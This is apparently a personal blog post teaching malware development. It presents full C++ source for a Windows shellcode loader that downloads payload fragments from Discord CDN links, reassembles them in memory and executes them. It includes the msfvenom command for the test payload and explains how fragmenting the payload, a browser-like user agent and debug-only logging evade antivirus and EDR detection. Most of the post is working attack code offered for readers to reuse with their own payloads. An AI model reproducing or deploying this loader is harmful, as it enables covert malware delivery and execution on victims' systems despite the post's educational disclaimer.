From URL to Execution: Assembling a Payload Entirely In-Memory

If you’re new to malware development (maldev), the sheer complexity can be overwhelming. How do you even begin to understand something as advanced as in-memory execution?

The answer is simple: you break it down.

This post is the culmination of my first major milestone: combining five core sub-projects into a single, functional loader that downloads a payload from a server, reassembles it directly in memory, and executes it—all without ever touching the disk.

I didn’t start here, though. I began by deconstructing the problem into the smallest possible parts. If you’re just starting out, I highly recommend you follow the same path. On my GitHub repository, I’ve structured these steps as Project 1, Sub-projects 1.1 to 1.5. They cover the absolute fundamentals:

1.1: Basic Memory Allocation (VirtualAlloc)
1.2: Downloading to Memory via WinHTTP
1.3: Parsing Headers In-Memory
1.4: Allocating Executable Memory
1.5: Handling Multiple Fractions

Master these first. Once you understand them, the combined code in this post will make perfect sense. This method of learning—dividing a complex problem into solvable chunks—is the most effective way to build deep, lasting knowledge.

Why a Fractionated Loader?

The core idea behind splitting a payload into fractions is evasion. By itself, a full payload might have a signature that antivirus (AV) or endpoint detection (EDR) software can easily spot. But broken into pieces and hosted on a seemingly legitimate server (like a Discord CDN), each fraction is just inert data.

It’s only when we download and reassemble those fractions in memory that the payload becomes executable. This allows us to bypass static, signature-based detection.

However, a note of caution: This technique is not a silver bullet. Modern EDRs are sophisticated. They use behavioral analysis and API hooking to monitor for exactly this kind of activity—a program allocating executable memory and writing to it. This loader is a foundational step, not a final product. It gets us past the first line of defense but sets the stage for the next challenges: bypassing hooks and evading behavioral detection.

Now, let’s dive into the code and see how it all comes together.

My Development Environment

Before we get into the nitty-gritty of the code, let’s talk about the setup I used to build and test this loader. Malware development often requires a mix of Linux and Windows environments, especially when targeting Windows systems (which is the case here, given the WinAPI calls we’ll be using). Here’s a breakdown of my toolkit:

Operating System: I’m running Kali Linux as my primary OS. It’s a fantastic choice for security research and development because it comes pre-loaded with a ton of tools for penetration testing, reverse engineering, and payload generation. Plus, its Debian base makes it stable and customizable.
Virtualization: For testing on Windows, I use KVM (Kernel-based Virtual Machine) to spin up isolated Windows VMs. This keeps my host machine clean and allows me to snapshot states before and after execution for easy rollback. I typically run Windows 10 or 11 guests, depending on the target environment.
Code Editor: Visual Studio Code (VS Code) is my go-to for writing and editing C++ code. It’s lightweight, extensible with plugins for C++ IntelliSense, debugging, and even Git integration, which makes managing my repo a breeze.
Compilation: Since this loader targets Windows, I cross-compile from Kali using the MinGW-w64 toolchain—specifically, x86_64-w64-mingw32-g++. This lets me build 64-bit Windows executables directly on Linux without needing to boot into a Windows machine every time.
Payload Generation: For creating the sample payload, I used msfvenom from Metasploit. It’s straightforward for generating shellcode or executables. In this case, I kept it simple: a payload that just launches calc.exe (the Windows calculator). Nothing fancy—just enough to demonstrate execution without risking real harm during testing. Here’s the command I used for reference: msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o payload.bin. I then fractionated this binary for the loader.
Debugging Output: To monitor the loader’s behavior without cluttering the console or risking detection artifacts, I use DebugView (from Sysinternals). This tool captures debug output from Windows applications in real-time, which is perfect for seeing what’s happening under the hood.

Why DebugView Over Console Output with printf?

You might wonder why I’m not just using standard console output like printf or std::cout for debugging. That’s a fair question, especially if you’re coming from general software development. In maldev, stealth and minimal footprints are key. Here’s why DebugView is superior in this context:

Stealth and Evasion: Printing to the console (e.g., via printf) creates visible output that could alert users or monitoring tools. It also requires the program to have a console subsystem, which might flag it as suspicious in AV scans. Debug output, on the other hand, uses OutputDebugString (a WinAPI function), which sends messages to the debugger without displaying anything on-screen unless a tool like DebugView is attached. This keeps the loader “quiet” during execution.
Non-Invasive Monitoring: DebugView runs separately and captures output from any process using debug strings. You can filter by process ID, highlight keywords, or save logs—all without modifying the code or attaching a full debugger like WinDbg, which could interfere with EDR hooks.
Better for In-Memory Operations: Since our loader is all about avoiding disk writes, console output might indirectly lead to logging or buffering that touches the filesystem. Debug strings are purely in-memory and ephemeral unless captured.
Portability in Testing: In a VM setup, I can run DebugView on the guest OS and monitor from my Kali host if needed (via shared folders or remote tools). It’s also great for catching errors in release builds where console output might be stripped.

In short, while printf is fine for quick scripts, DebugView aligns better with maldev principles: observe without being observed. If you’re following along, grab it from the Microsoft Sysinternals suite—it’s free and essential for Windows debugging.

Now, with the setup out of the way, let’s dive into the code and see how it all comes together.

Code Sections

#include <windows.h>
#include <winhttp.h>
#pragma comment(lib, "winhttp.lib")

void debugprint(LPCWSTR format, ...) {
    WCHAR buffer[1024];
    va_list arg;
    va_start(arg, format);
    wvsprintfW(buffer, format, arg);
    va_end(arg);
    OutputDebugStringW(buffer);
}

int find_ordinal(BYTE* pHeader) {
    CHAR ordinal_char = (char)pHeader[11];
    int ordinal = ordinal_char - '0';
    return ordinal;
}

int main() {
    WCHAR urls[10][512] = { //here you have to add links eg: L"https://first_fraction.vx"
        
    };

    HINTERNET session = WinHttpOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS,
        0
    );
    
    if (!session) {
        debugprint(L"session is failed error: %lu\n", GetLastError());
        return 1;
    }

    // Store each payload with its ordinal
    struct PayloadChunk {
        int ordinal;
        BYTE* data;
        SIZE_T size;
    };
    
    PayloadChunk chunks[10] = {0};
    int chunk_count = 0;
    SIZE_T total_final_size = 0;

    for (int i = 0; i < 10; i++) {
        const wchar_t* url = urls[i];
        debugprint(L"urls %ls\n", url);

        URL_COMPONENTS urlcomp = {0};
        urlcomp.dwStructSize = sizeof(urlcomp);
        WCHAR hostname[256] = {0};
        urlcomp.lpszHostName = hostname;
        urlcomp.dwHostNameLength = sizeof(hostname) / sizeof(WCHAR);

        if (!WinHttpCrackUrl(url, wcslen(url), 0, &urlcomp)) {
            debugprint(L"unable to crack the url %lu\n", GetLastError());
            continue;
        }

        HINTERNET connect = WinHttpConnect(session, hostname, urlcomp.nPort, 0);
        if (!connect) {
            debugprint(L"connect is failed error: %lu\n", GetLastError());
            continue;
        }

        HINTERNET open_request = WinHttpOpenRequest(
            connect,
            L"GET",
            urls[i] + wcslen(L"https://cdn.discordapp.com"),
            NULL,
            WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE
        );

        if (!open_request) {
            debugprint(L"failed to open request error: %lu\n", GetLastError());
            WinHttpCloseHandle(connect);
            continue;
        }

        BOOL send_request = WinHttpSendRequest(
            open_request,
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            WINHTTP_NO_REQUEST_DATA,
            0,
            0,
            0
        );

        if (!send_request) {
            debugprint(L"failed to send request error: %lu\n", GetLastError());
            WinHttpCloseHandle(open_request);
            WinHttpCloseHandle(connect);
            continue;
        }

        BOOL receive_response = WinHttpReceiveResponse(open_request, NULL);
        if (!receive_response) {
            debugprint(L"could not receive the response %lu\n", GetLastError());
            WinHttpCloseHandle(open_request);
            WinHttpCloseHandle(connect);
            continue;
        }

        DWORD dwsize = 0;
        BYTE* pDownload = NULL;
        SIZE_T total_size = 0;
        SIZE_T buffer_size = 4096;
        
        pDownload = (BYTE*)VirtualAlloc(NULL, buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (!pDownload) {
            debugprint(L"failed to allocate pDownload error: %lu\n", GetLastError());
            WinHttpCloseHandle(open_request);
            WinHttpCloseHandle(connect);
            continue;
        }

        do {
            dwsize = 0;
            if (!WinHttpQueryDataAvailable(open_request, &dwsize)) {
                debugprint(L"failed WinHttpQueryDataAvailable error: %lu\n", GetLastError());
                break;
            }

            if (dwsize == 0) break;

            if (dwsize + total_size > buffer_size) {
                SIZE_T new_buffer_size = buffer_size;
                while (dwsize + total_size > new_buffer_size) {
                    new_buffer_size *= 2;
                }

                BYTE* pNew_download = (BYTE*)VirtualAlloc(NULL, new_buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                if (!pNew_download) {
                    debugprint(L"unable to allocate memory for new_download error: %lu\n", GetLastError());
                    break;
                }

                CopyMemory(pNew_download, pDownload, total_size);
                VirtualFree(pDownload, 0, MEM_RELEASE);
                pDownload = pNew_download;
                buffer_size = new_buffer_size;
            }

            DWORD dw_download = 0;
            if (!WinHttpReadData(open_request, pDownload + total_size, dwsize, &dw_download)) {
                debugprint(L"failed to read the bytes error: %lu\n", GetLastError());
                break;
            }

            total_size += dw_download;
        } while (dwsize > 0);

        debugprint(L"total downloaded size %d\n", total_size);

        if (total_size >= 32) {
            // Extract ordinal from header
            int ordinal = find_ordinal(pDownload);
            debugprint(L"ordinal %d\n", ordinal);

            // Extract payload (everything after 32 bytes)
            SIZE_T payload_size = total_size - 32;
            BYTE* payload_data = pDownload + 32;

            debugprint(L"payload size %d\n", payload_size);

            // Store this chunk
            if (chunk_count < 10) {
                chunks[chunk_count].ordinal = ordinal;
                chunks[chunk_count].size = payload_size;
                
                // Allocate memory and copy payload
                chunks[chunk_count].data = (BYTE*)VirtualAlloc(NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
                if (chunks[chunk_count].data) {
                    CopyMemory(chunks[chunk_count].data, payload_data, payload_size);
                    total_final_size += payload_size;
                    chunk_count++;
                }
            }
        }

        VirtualFree(pDownload, 0, MEM_RELEASE);
        WinHttpCloseHandle(open_request);
        WinHttpCloseHandle(connect);
    }

    // Now assemble the final payload in correct order
    BYTE* final_payload = NULL;
    SIZE_T current_offset = 0;
    DWORD old_protect = 0;
    
    if (total_final_size > 0) {
        final_payload = (BYTE*)VirtualAlloc(NULL, total_final_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (final_payload) {
            current_offset = 0;
            
            // Copy chunks in ordinal order (0, 1, 2, 3, ...)
            for (int ord = 0; ord < 10; ord++) {
                for (int i = 0; i < chunk_count; i++) {
                    if (chunks[i].ordinal == ord) {
                        CopyMemory(final_payload + current_offset, chunks[i].data, chunks[i].size);
                        current_offset += chunks[i].size;
                        debugprint(L"Added chunk ordinal %d, size %d at offset %d\n", ord, chunks[i].size, current_offset - chunks[i].size);
                        break;
                    }
                }
            }

            debugprint(L"Final assembled payload size: %d bytes\n", current_offset);

            // Change memory protection to executable
            if (!VirtualProtect(final_payload, current_offset, PAGE_EXECUTE_READ, &old_protect)) {
                debugprint(L"[-] VirtualProtect failed! Error: %lu\n", GetLastError());
                VirtualFree(final_payload, 0, MEM_RELEASE);
                final_payload = NULL;
            } else {
                // Execute the shellcode
                typedef void (*ShellcodeFunc)();
                ShellcodeFunc func = (ShellcodeFunc)final_payload;
                func();
                
                VirtualFree(final_payload, 0, MEM_RELEASE);
            }
        }
    }

    // Cleanup chunk memory
    for (int i = 0; i < chunk_count; i++) {
        if (chunks[i].data) {
            VirtualFree(chunks[i].data, 0, MEM_RELEASE);
        }
    }

    WinHttpCloseHandle(session);
    return 0;
}

Proof of Concept

Explaining the Code: Building the Fractionated Loader

Now that we’ve covered the why and the setup, let’s walk through the code for our in-memory loader. My goal was to create a program that downloads payload fractions from a server, reassembles them in memory, and executes the payload—all without touching the disk. This ties back to the sub-projects I outlined earlier (1.1–1.5), which taught me the fundamentals of memory allocation, downloading data, parsing headers, and handling fractions.

I’ll break down the code into its core components, explaining my approach, the challenges I faced, and how each piece contributes to the final loader. If you’re following along, I recommend checking out the full code on my GitHub repo and experimenting with the sub-projects first. Let’s dive in!

1. Debugging with debugprint

void debugprint(LPCWSTR format, ...) {
    WCHAR buffer[1024];
    va_list arg;
    va_start(arg, format);
    wvsprintfW(buffer, format, arg);
    va_end(arg);
    OutputDebugStringW(buffer);
}

To monitor the loader’s behavior without leaving artifacts, I used OutputDebugStringW for logging, which DebugView captures in real-time. This aligns with Sub-project 1.3 (parsing headers in-memory) and my goal of staying stealthy.

What It Does: The debugprint function is a wrapper for OutputDebugStringW, which sends wide-character strings to DebugView. It uses variable arguments (va_list) to format messages, similar to printf, but outputs to the debug stream instead of the console.

Why It Matters: Console output (e.g., printf) is visible and might trigger detection by AV or EDR systems. DebugView lets me monitor progress (e.g., errors or download status) without leaving traces. I used wvsprintfW for formatting wide strings, though it’s not the most secure option. For learning, you could swap it with safer alternatives like _snwprintf, but wvsprintfW works for now since we’re focusing on functionality.

Challenge: Early on, I forgot to use wide-character strings (LPCWSTR) for WinAPI compatibility, which caused garbled output. Using wide strings and OutputDebugStringW fixed this.

Usage Example: debugprint(L”Failed to allocate memory: %lu\n”, GetLastError());

2. Extracting the Ordinal with find_ordinal

Each payload fraction has a header (added by my breaker tool, available on GitHub) that includes an ordinal to indicate its order. This ties to Sub-project 1.5 (handling multiple fractions).

int find_ordinal(BYTE* pHeader) {
    CHAR ordinal_char = (char)pHeader[11];
    int ordinal = ordinal_char - '0';
    return ordinal;
}

What It Does: This function reads the 11th byte of the downloaded fraction’s header, which contains the ordinal (e.g., ‘0’ for the first fraction). It converts this ASCII character to an integer by subtracting ‘0’ (ASCII 48).

Why It Matters: The ordinal tells us where this fraction fits in the final payload. Without it, we’d have a jumbled mess. My breaker tool embeds the ordinal at position 11, so we extract it here.

Challenge: This approach assumes single-digit ordinals (0–9). For more fractions (e.g., 11 or 15), I’d need to use atoi to parse multi-digit numbers. For this demo with 10 fractions, the simple subtraction works fine.

3. Main Function: Setting Up the Loader

The main function orchestrates everything: downloading fractions, parsing them, reassembling the payload, and executing it. Let’s break it down step-by-step.

3.1. Defining URLs

I start by defining an array of URLs hosting the payload fractions (created with msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o payload.bin and split using my breaker tool). These are hosted on a Discord CDN for this demo.

WCHAR urls[10][512] = {
    L"https://cdn.discordapp.com/attachments/.../Fraction0.vx?...",
    // ... (9 more URLs)
};

Why 512?: Each URL is long due to Discord’s query parameters, so 512 wide characters is sufficient. If you use a different server with shorter URLs, you could reduce this size.

Tip: Hardcoding URLs is fine for a proof-of-concept, but in a real scenario, you’d want a dynamic list (e.g., fetched from a C2 server) to avoid static detection.

3.2. Initializing WinHTTP

To download the fractions in-memory (Sub-project 1.2), I use the WinHTTP API, which is native to Windows and supports HTTPS.

HINTERNET session = WinHttpOpen(
    L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY,
    WINHTTP_NO_PROXY_NAME,
    WINHTTP_NO_PROXY_BYPASS,
    0
);
if (!session) {
    debugprint(L"Session failed: %lu\n", GetLastError());
    return 1;
}

What It Does: WinHttpOpen creates a session handle, which is the foundation for all HTTP operations. I used a browser-like user agent to blend in with normal traffic.

Mistake I Made: Initially, I put WinHttpOpen inside the URL loop, creating multiple sessions unnecessarily. It’s more efficient to create one session and reuse it for all downloads.

Why It Matters: This sets up a secure, in-memory download pipeline. If the session fails, we log the error with debugprint and exit.

3.3. Storing Payload Chunks

To keep track of fractions, I created a PayloadChunk struct.

struct PayloadChunk {
    int ordinal;
    BYTE* data;
    SIZE_T size;
};
PayloadChunk chunks[10] = {0};
int chunk_count = 0;
SIZE_T total_final_size = 0;

Why This Approach?: Each fraction has an ordinal, data, and size. Storing them in a struct lets me reassemble them in the correct order later. I tried using offsets initially, but that required fixed-size fractions, which isn’t flexible. The struct approach scales better since it doesn’t assume uniform sizes.

3.4. Downloading and Processing Fractions

This is the heart of the loader: a loop that downloads each fraction, extracts its ordinal, and stores it. Here’s the key flow:

Crack the URL: I use WinHttpCrackUrl to extract the hostname and port. I struggled with getting the correct object filename, so I hardcoded the path offset (wcslen(L”https://cdn.discordapp.com”)) for simplicity. In production, you’d want a more robust parsing method.
Connect and Request: Using WinHttpConnect, WinHttpOpenRequest, WinHttpSendRequest, and WinHttpReceiveResponse, I establish a connection and fetch the fraction.
Dynamic Memory Allocation: Each fraction is downloaded into a buffer allocated with VirtualAlloc (Sub-project 1.1). If the data exceeds the buffer size, I dynamically resize it.

if (dwsize + total_size > buffer_size) {
    SIZE_T new_buffer_size = buffer_size;
    while (dwsize + total_size > new_buffer_size) {
        new_buffer_size *= 2;
    }
    BYTE* pNew_download = (BYTE*)VirtualAlloc(NULL, new_buffer_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!pNew_download) {
        debugprint(L"Unable to allocate memory: %lu\n", GetLastError());
        break;
    }
    CopyMemory(pNew_download, pDownload, total_size);
    VirtualFree(pDownload, 0, MEM_RELEASE);
    pDownload = pNew_download;
    buffer_size = new_buffer_size;
}

What It Does: If the downloaded data (dwsize) plus the current buffer content (total_size) exceeds the buffer size, I double the buffer size until it’s large enough, allocate a new buffer, copy the existing data, and free the old buffer.

Why Dynamic?: Fractions vary in size, and WinHttpQueryDataAvailable only tells us how much data is available at a time. This ensures we don’t run out of space mid-download.

Extract and Store: After downloading, I call find_ordinal to get the fraction’s order, skip the 32-byte header, and store the payload data in a PayloadChunk.

if (total_size >= 32) {
    int ordinal = find_ordinal(pDownload);
    SIZE_T payload_size = total_size - 32;
    BYTE* payload_data = pDownload + 32;
    chunks[chunk_count].ordinal = ordinal;
    chunks[chunk_count].size = payload_size;
    chunks[chunk_count].data = (BYTE*)VirtualAlloc(NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    CopyMemory(chunks[chunk_count].data, payload_data, payload_size);
    total_final_size += payload_size;
    chunk_count++;
}

Challenge: Early on, I forgot to check if total_size >= 32, which caused crashes when downloading incomplete fractions. Adding this check ensured robustness.

3.5. Reassembling and Executing the Payload

Once all fractions are downloaded, I reassemble them in ordinal order.

BYTE* final_payload = (BYTE*)VirtualAlloc(NULL, total_final_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (final_payload) {
    SIZE_T current_offset = 0;
    for (int ord = 0; ord < 10; ord++) {
        for (int i = 0; i < chunk_count; i++) {
            if (chunks[i].ordinal == ord) {
                CopyMemory(final_payload + current_offset, chunks[i].data, chunks[i].size);
                current_offset += chunks[i].size;
                debugprint(L"Added chunk %d, size %d at offset %d\n", ord, chunks[i].size, current_offset - chunks[i].size);
                break;
            }
        }
    }
}

What It Does: I allocate a final buffer for the reassembled payload, then copy each chunk’s data in order (0, 1, 2, …, 9). The current_offset tracks where to place each chunk.

Execution: To execute the payload (a calc.exe shellcode in this case), I change the memory protection to executable (Sub-project 1.4) and call it as a function.

if (VirtualProtect(final_payload, current_offset, PAGE_EXECUTE_READ, &old_protect)) {
    typedef void (*ShellcodeFunc)();
    ShellcodeFunc func = (ShellcodeFunc)final_payload;
    func();
}

Why It Matters: Changing to PAGE_EXECUTE_READ allows execution while minimizing permissions. The shellcode runs calc.exe, proving the loader works.

Challenge: EDRs often hook VirtualProtect, so this step could trigger detection. For now, it’s a proof-of-concept, but future posts will explore bypassing these hooks.

3.6. Cleanup

Finally, I free all allocated memory and close WinHTTP handles to avoid leaks.

for (int i = 0; i < chunk_count; i++) {
    if (chunks[i].data) VirtualFree(chunks[i].data, 0, MEM_RELEASE);
}
WinHttpCloseHandle(session);

Why It Matters: Proper cleanup ensures no memory leaks, which is critical for stealth and stability.

Lessons Learned

Modularity: Breaking the problem into sub-projects (1.1–1.5) made it manageable. Each sub-project built a skill I needed for the final loader.
Error Handling: Checking every WinAPI call (e.g., WinHttpOpen, VirtualAlloc) and logging errors with debugprint saved me hours of debugging.
Flexibility: The PayloadChunk struct made reassembly robust, avoiding the pitfalls of hardcoded offsets or fixed sizes.
Stealth: Using DebugView and in-memory operations minimized my footprint, but I’m aware EDRs could still detect this. That’s the next challenge!

Disclaimer

This project is intended solely for educational and research purposes to understand malware development techniques in a controlled, ethical environment. The code and concepts discussed here should not be used to harm systems, networks, or individuals. Malware development is a sensitive topic, and I strongly encourage responsible use of this knowledge, such as in security research or red teaming with explicit permission. Always comply with applicable laws and ethical guidelines. I am not responsible for any misuse of the information or code provided.

Try It Yourself

The full code is below, but I encourage you to clone my GitHub repo and start with the sub-projects (1.1–1.5). Experiment with your own msfvenom payloads or different servers to see how it works. If you hit issues, check DebugView logs or drop a comment—I’d love to hear your feedback!

Connect With Me

I’m always excited to connect with fellow security enthusiasts, developers, and learners! Follow me on X rootfu_ for quick updates on my projects, or connect with me on LinkedIn to dive deeper into malware development, security research, or just chat about tech. Let me know what you’re working on—I’d love to learn from you too!